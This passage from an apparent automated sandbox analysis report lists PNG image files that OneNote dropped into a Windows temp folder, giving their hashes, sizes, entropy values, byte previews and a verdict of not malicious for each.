SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{9A4D9A0D-BDE8-43F9-8DA8-6621AC2D1CA8}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{9B21CB47-EC30-4B35-969E-627F71D2E804}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{9B22889E-95CA-4999-A522-4EB516891E6B}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{9C42923B-E0A3-4E58-AB3E-4C094BB27F5D}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{9C4457FA-A54C-4BBB-ADC3-20E2B9F60085}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{9D9C9009-E55C-4584-AA72-8B37BBEC0D27}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{9DDD7668-CBF7-43CC-B12C-2EEB6EC3D60C}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{9EC58BB4-8E74-43C1-AED7-412F59B701B7}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{9FCD5619-490E-414D-BC91-E69548B5658A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{A10A4BF6-9936-47BD-90B4-E4E765AD3366}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{A169869F-122D-4888-A0E5-5A4CED3AA2D4}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{A2F7E2F7-C058-4E6C-B085-4153F102EAF5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{A4D46FB1-7445-4953-B1DD-16FFD95693BF}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{A88FAF0C-2EAA-45FB-A3F0-99B7B3E237C1}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
